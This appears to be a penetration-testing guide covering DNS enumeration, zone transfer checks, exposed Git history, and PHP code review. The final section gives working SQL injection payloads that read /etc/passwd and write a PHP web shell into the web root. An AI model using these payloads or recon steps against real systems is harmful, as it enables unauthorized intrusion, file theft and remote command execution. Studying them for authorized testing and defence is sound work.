Reconnaissance: Advanced OSINT and Code Review Techniques

Reconnaissance is the foundation of any successful security assessment. The goal is to map the attack surface - every possible entry point where an attacker can interact with a system. This includes exposed domains, subdomains, services, misconfigurations, and even hidden code paths.

This guide covers practical techniques for DNS enumeration, zone transfers, Git repository analysis, and manual code review to uncover vulnerabilities before they are exploited.

Check DNS TXT Records

TXT records are often used for domain ownership verification (e.g., Google Workspace, AWS, Let's Encrypt) or service configuration (SPF, DKIM, DMARC).

Always check them during reconnaissance:

dig txt example.com

They may reveal:

Third-party services in use
Domain verification tokens
Internal infrastructure hints

Subdomain Enumeration

Discover hidden subdomains using automated tools and wordlists:

amass enum -d example.com
ffuf -u https://FUZZ.example.com -w /path/to/wordlist.txt

Common targets include:

dev.example.com
admin.example.com
internal.example.com

DNS Zone Transfer (AXFR)

DNS zone transfers are used to synchronize DNS servers. Normally restricted, but if misconfigured, they can leak the entire internal DNS structure.

Test for AXFR vulnerability:

dnsrecon -d z.hackycorp.com -t axfr

To manually check:

Find the name server:

dig ns example.com

Attempt zone transfer for a suspected internal zone:

dig axfr int @ns1.example.com

Success reveals internal hosts like db.int, mail.int, etc.

Check DNS Server Version

Identify the BIND version for potential exploitation:

dnsrecon -d example.com
dig +short -c chaos -t txt "version.bind" @example.com

Outdated versions may have known vulnerabilities.

Analyze Git Repository History

If a .git directory is exposed, you can clone and inspect the full history:

git clone https://example.com/.git
git log --diff-filter=D     # Show deleted files
git show         # View content of a commit

Deleted files may contain secrets, credentials, or sensitive logic.

Manual Code Review Techniques

When source code is available, perform a structured review.

Search for Dangerous Patterns

Use grep to find high-risk functions. For PHP:

grep -R 'system\(\$_' *
grep -R 'exec\|shell_exec\|passthru' *
grep -R '\$_GET\|\$_POST\|\$_REQUEST\|\$_COOKIE' *

Track User Input

Follow all user-controlled inputs through the application:

$_GET, $_POST, $_REQUEST - HTTP parameters
$_COOKIE - user cookies
$_SERVER - server/environment data

Look for unsafe usage without validation, escaping, or sanitization.

Functional Review

Focus on critical functionality:

Password reset
Authentication logic
Database access
File upload/download

What to Look For

Strange behavior - unexpected responses or logic
Missing checks - no input validation, authentication, or authorization
Complexity - overly complex code may hide flaws
Security controls in place - are they properly implemented?
Differences between functions - inconsistent handling of data
Conditionals (if/else) - potential logic flaws
Regular expressions - weak patterns or ReDoS vulnerabilities

Common Vulnerabilities to Detect

SQL Injection (SQLi)

Test for file read via UNION-based SQLi (if DB user has privileges):

0%20union%20select%201,2,load_file("/etc/passwd"),4

Web Shell Upload via SQLi

Write a PHP web shell to a writable directory (e.g., /css):

id=1%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

id=1%20union%20select%201,2,%22%3C?php%20system($_GET['c']);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

This creates a backdoor accessible at https://example.com/css/z.php?c=whoami.

On This Page